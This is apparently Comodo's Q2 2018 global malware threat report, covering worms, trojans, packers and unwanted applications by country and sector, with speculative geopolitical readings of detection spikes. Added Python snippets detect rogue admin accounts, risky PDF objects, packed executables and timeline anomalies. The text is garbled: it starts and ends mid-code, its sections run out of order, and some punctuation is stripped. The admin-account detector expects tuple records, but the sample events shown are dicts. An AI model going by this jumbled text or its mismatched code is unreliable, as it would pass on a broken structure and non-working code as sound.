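# Group names (lower-cased) whose membership grants administrative rights.
ADMIN_GROUPS = {"administrators", "domain admins"}


def parse_event(rec):
    """Turn one flat record into a dict with a real datetime."""
    ts, event_id, subject, target, group = rec
    return {"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "event_id": event_id,
            "subject": subject, "target": target, "group": group}


def find_new_admin_accounts(records, window=timedelta(minutes=10)):
    """Return (account, subject, seconds_between) for every account whose
    creation (4720) is followed within `window` by admin-group membership (4732).
    A 4732 for an account with no preceding 4720 is a routine change and is
    deliberately not flagged here."""
    events = sorted((parse_event(r) for r in records), key=lambda e: e["ts"])
    created = {}   # account name (lower-cased) -> (creation time, creating subject)
    hits = []
    for e in events:
        if e["event_id"] == 4720:
            created[e["target"].lower()] = (e["ts"], e["subject"])
        elif e["event_id"] == 4732 and (e["group"] or "").lower() in ADMIN_GROUPS:
            key = e["target"].lower()
            if key in created:
                t0, _creator = created[key]
                delta = e["ts"] - t0
                if timedelta(0) <= delta <= window:
                    hits.append((e["target"], e["subject"], int(delta.total_seconds())))
    return hits


if __name__ == "__main__":
    for account, subject, secs in find_new_admin_accounts(SAMPLE_EVENTS):
        print(f"ALERT: '{account}' created and granted admin rights {secs}s later by {subject}")
```

Tuning the window is the main design choice: a provisioning tool legitimately creates and elevates accounts within seconds too, so in production the rule is usually paired with an allow-list of approved subjects (the `subject` field is returned for exactly that reason).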
5.2.4 Exploits
Computer Exploits comprise software, chunks of data, or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation, or denial-of-service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware, and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
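Because most of the quarter's exploit detections were PDF-borne, a defender's first triage step is a static look for the PDF object types that carry or trigger code: /OpenAction and /AA (run something automatically), /JavaScript, /JS and /Launch (the code or command itself), and embedded files. The scanner below is an added example, not Comodo's tooling; the minimal PDF it scans is constructed inline, and the scanner also decodes the #XX hex-escape form of PDF names (e.g. /Java#53cript), which a plain keyword grep would miss.

```python
"""Static triage of a PDF for the object types most often used to deliver
exploit code.  Added example; SAMPLE_PDF is a constructed minimal file."""
import re
from collections import Counter

# Name objects that make a PDF worth a closer look.
RISKY_NAMES = ("/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
               "/EmbeddedFile", "/RichMedia", "/ObjStm")


def normalise_names(data: bytes) -> bytes:
    """Decode #XX hex escapes inside PDF name objects so that an obfuscated
    /Java#53cript is counted the same as /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def count_risky_names(data: bytes) -> Counter:
    """Count each risky name; a name token ends at a delimiter, so /JS never matches /JSx."""
    data = normalise_names(data)
    counts = Counter()
    for name in RISKY_NAMES:
        pattern = re.escape(name.encode()) + rb"(?![A-Za-z0-9_])"
        n = len(re.findall(pattern, data))
        if n:
            counts[name] = n
    return counts


def triage(data: bytes):
    """Return (verdict, counts).  An automatic trigger combined with script or
    launch capability is the classic exploit-document shape."""
    counts = count_risky_names(data)
    auto = any(k in counts for k in ("/OpenAction", "/AA"))
    script = any(k in counts for k in ("/JavaScript", "/JS", "/Launch"))
    if auto and script:
        verdict = "suspicious: automatic action with script or launch capability"
    elif counts:
        verdict = "review: risky objects present"
    else:
        verdict = "no risky objects found"
    return verdict, counts


# Constructed sample: a catalog whose OpenAction points at a JavaScript action
# object, with the /JavaScript name hex-escaped the way evasive samples do it.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /Java#53cript /JS (app.alert(1)) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    verdict, counts = triage(SAMPLE_PDF)
    print(verdict, dict(counts))
```

This is a keyword-level check only: names hidden inside compressed object streams (/ObjStm) or encrypted documents are not visible to it, which is why /ObjStm itself is on the list as a reason to inflate and rescan.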
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools, and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2 Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a “Severe” malware threat to PC users.
In Q2 Germany (de) was the top country of detection for Constructors.
And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
“Packing” malware refers to any means used to hide or obfuscate malicious executable code by compressing or “packing” it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified “Ultimate Packer for Executables”, dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018 Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
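The traces a UPX-style packer leaves in a Windows PE file can be checked with a small section-table parser: sections named UPX0/UPX1, a UPX0 section with no data on disk but a large virtual size (the space reserved for the unpacked image), and section data with near-random byte distribution (compressed or encrypted code). The script below is an added example, not code from Comodo or from the UPX project; it builds two toy PE images in memory (one with a UPX-style layout, one plain), uses only the Python standard library, and keeps the packer-name list deliberately short because entropy is the generic signal that survives a renamed or modified packer.

```python
"""Packer triage for a Windows PE: parse the section table and report the
indicators a UPX-style packer leaves behind.  Added example; the two PE
images at the bottom are constructed in memory for the demo."""
import math
import struct
from collections import Counter

KNOWN_PACKER_SECTIONS = {b"UPX0", b"UPX1", b"UPX2"}   # deliberately short list
HIGH_ENTROPY = 7.0   # bits per byte; compressed or encrypted data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of `data`; 0.0 for constant data, 8.0 for a uniform byte mix."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Return [(name, virtual_size, raw_bytes)] from a PE image using the
    documented header layout: e_lfanew at 0x3C, COFF header after 'PE\\0\\0',
    section headers (40 bytes each) after the optional header."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    sections = []
    for i in range(n_sections):
        name, vsize, _rva, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append((name.rstrip(b"\0"), vsize, raw))
    return sections


def packer_indicators(pe: bytes):
    """Return (verdict, findings); findings is a list of (section name, reason)."""
    findings = []
    for name, vsize, raw in parse_sections(pe):
        label = name.decode(errors="replace")
        if name in KNOWN_PACKER_SECTIONS:
            findings.append((label, "known packer section name"))
        if not raw and vsize > 0:
            findings.append((label, "no raw data but %d bytes reserved in memory (unpack target)" % vsize))
        if raw and shannon_entropy(raw) >= HIGH_ENTROPY:
            findings.append((label, "entropy %.2f bits/byte" % shannon_entropy(raw)))
    return ("likely packed" if findings else "no packer indicators"), findings


def build_pe(sections):
    """Assemble a minimal PE image from [(name, raw_bytes, virtual_size)].
    Constructed test fixture only: headers are zero-filled beyond what the parser reads."""
    opt_size = 224
    table_off = 0x40 + 4 + 20 + opt_size
    data_off = (table_off + 40 * len(sections) + 0x1FF) & ~0x1FF   # file-align to 0x200
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    headers, blobs, ptr, rva = b"", b"", data_off, 0x1000
    for name, raw, vsize in sections:
        headers += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, rva,
                               len(raw), ptr if raw else 0, 0, 0, 0, 0, 0x60000020)
        blobs += raw
        ptr += len(raw)
        rva += max(vsize, len(raw), 0x1000)
    image = dos + b"PE\0\0" + coff + b"\0" * opt_size + headers
    return image.ljust(data_off, b"\0") + blobs


# Constructed samples: UPX-style layout vs. a plain image with low-entropy code.
PACKED = build_pe([(b"UPX0", b"", 0x10000),
                   (b"UPX1", bytes(range(256)) * 8, 0x800),
                   (b".rsrc", b"\0" * 512, 0x200)])
PLAIN = build_pe([(b".text", bytes([0x55, 0x8B, 0xEC]) * 300, 0x400),
                  (b".data", b"\0" * 256, 0x100)])

if __name__ == "__main__":
    for label, image in (("packed", PACKED), ("plain", PLAIN)):
        verdict, findings = packer_indicators(image)
        print(label, "->", verdict, findings)
```

A high-entropy section on its own is not proof of packing (resource sections holding compressed images or certificates score high too), so a production rule weights the combination of indicators rather than any one of them.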
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm email servers with messages in order to “kill” or shut them down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV, and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
“Joke” malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a “Medium” threat because the hacker’s intention is not to damage or destroy information, but merely to have fun at the victim’s expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous – but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications, and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a “Potentially Unwanted Application” or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior, and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip, and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as “poor reputation” software that tries to install additional bundled software, modify the user homepage, modify the search provider, and/or perform other actions users might not have intended. They include free toolbars, adware, and “system optimizers”.
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to “crack” or patch unregistered copies of Microsoft software. These are referred to as “hacktools” and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section, let’s examine unique malware profiles that Comodo identified within specific “verticals” or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses, and Worms. Further, the diagram lists the #1 malware family for each Vertical’s top malware type.
Let’s take a closer look at two trojans, Kryptik and Zbot, that were the top detection not in just one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host’s FTP servers, but now has the ability to target email clients, file browsers, and file managers. CNET Magazine wrote that Kryptik has been used as a trojan “Clicker” to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let’s examine “Zbot”, which is another name for the “Zeus” Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target’s computer already has a Virus and needs to be cleaned.
In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military, and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo’s aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place at the same time as the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies, and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or “cracking” software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics, or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia’s 2018 political revolution was accompanied by Comodo’s largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that “information wants to be free”. Evidence for this argument is provided by this timeline, which shows Comodo’s Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of “fake news”, Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny, or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine’s Independence Day as well as Ukraine’s testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine’s capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an “act of hostility”.
7.10 Finland, Russia, USA
Finally, let’s have a look at Comodo’s virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki’s suburb of Vantaa – precisely where the summit was scheduled to take place.
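The timelines in chapter 5 and throughout chapter 7 are read by eye for spikes; the report does not say how a spike is defined. In practice an analyst wants a rule that flags a day automatically and does not let one huge day raise the baseline so much that the following day's spike disappears. The function below is an added example, not Comodo's method: it scores each day against a robust baseline (median and median absolute deviation of the preceding window) rather than a mean, and runs over a constructed daily detection series.

```python
"""Flag anomalous days in a daily detection-count timeline.  Added example;
SAMPLE_SERIES is a constructed series, not data from the report."""
from statistics import median

# Constructed daily detection counts for one country: a quiet baseline around
# 1,200, one huge day (June 4) and a two-day elevated period (June 12-13).
SAMPLE_SERIES = [
    ("2018-06-01", 1210), ("2018-06-02", 1180), ("2018-06-03", 1295), ("2018-06-04", 9870),
    ("2018-06-05", 1240), ("2018-06-06", 1302), ("2018-06-07", 1150), ("2018-06-08", 1275),
    ("2018-06-09", 1190), ("2018-06-10", 1330), ("2018-06-11", 1260), ("2018-06-12", 4400),
    ("2018-06-13", 4650), ("2018-06-14", 1220),
]


def robust_zscore(value, window):
    """Distance of `value` from the window median, in MAD-derived standard deviations.
    Median/MAD are insensitive to a single outlier already inside the window."""
    med = median(window)
    mad = median(abs(x - med) for x in window)
    scale = 1.4826 * mad if mad else 1.0   # 1.4826 converts MAD to a sigma for normal data
    return (value - med) / scale


def find_spikes(series, lookback=7, threshold=6.0):
    """Return (day, count, score) for days whose robust z-score >= threshold.
    Flagged days are kept out of the baseline so that a spike does not inflate
    the baseline used for the days that follow it (June 13 would otherwise be
    judged against June 12)."""
    spikes, baseline = [], []
    for day, count in series:
        if len(baseline) >= 3:                      # need a few days before scoring
            score = robust_zscore(count, baseline[-lookback:])
            if score >= threshold:
                spikes.append((day, count, round(score, 1)))
                continue                            # spike is excluded from the baseline
        baseline.append(count)
    return spikes


if __name__ == "__main__":
    for day, count, score in find_spikes(SAMPLE_SERIES):
        print(f"{day}: {count} detections (robust z = {score})")
```

The threshold of 6 is deliberately conservative: daily detection counts for a whole country are heavy-tailed, and a low threshold on such data produces a flag almost every week. The lookback window should cover at least a full week so that weekday/weekend rhythm is part of the baseline.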
8 Conclusions
In Q2 Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies, and postures.
North America: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel +1 (888) 551 1531, Tel +1 (888) 266 6361, Int +1 (703) 581 6361, Fax +1 (973) 777 4394, sales@comodo.com
Europe: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel +40 332 806 772
Asia: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800, www.comodo.co.in

About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other “unknown” potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day.
The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL’s mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world’s largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures from individuals to mid-sized companies to the world’s largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
4.2.3 June 2018
[Figure: Android-targeted malware in June 2018; y-axis from 0 to 300,000 detections]

5 Malware in Q2 2018: The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries’ top-level domains (ccTLD). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm, by far, was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za), and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans, and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem, or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction, and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable (EXE) files and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, because their malicious functionality is hidden within seemingly useful or benign computer programs. Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
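The behaviour described for Starter, a new local account that is immediately added to the administrators group, leaves a clear trail in the Windows Security audit log. The Python below is an added example, not Comodo's code and not taken from the report: it correlates constructed records shaped like event 4720 (user account created) and event 4732 (member added to a security-enabled local group). The account and principal names are invented, and the ten-minute window is an assumed tuning parameter.

```python
"""Correlate Windows Security events to spot a freshly created local account
that is promptly added to an administrative group, the behaviour the report
attributes to the Starter trojan. Added example, not Comodo's code. The event
records below are constructed to mimic event IDs 4720 (user account created)
and 4732 (member added to a security-enabled local group); they are not real
logs. A real 4732 carries the member's SID rather than a name, so resolve it
(or match on the SID reported by the 4720) before applying this correlation."""
from datetime import datetime, timedelta

# Constructed sample events (hypothetical values throughout).
SAMPLE_EVENTS = [
    {"time": "2018-06-02T03:14:05", "id": 4720, "subject": "CORP\\svc-backup",
     "target": "Remote Service Account", "group": None},
    {"time": "2018-06-02T03:14:07", "id": 4732, "subject": "CORP\\svc-backup",
     "target": "Remote Service Account", "group": "Administrators"},
    # Ordinary provisioning: account created, non-admin group change two days
    # later. This must not be flagged.
    {"time": "2018-06-02T09:00:00", "id": 4720, "subject": "CORP\\helpdesk",
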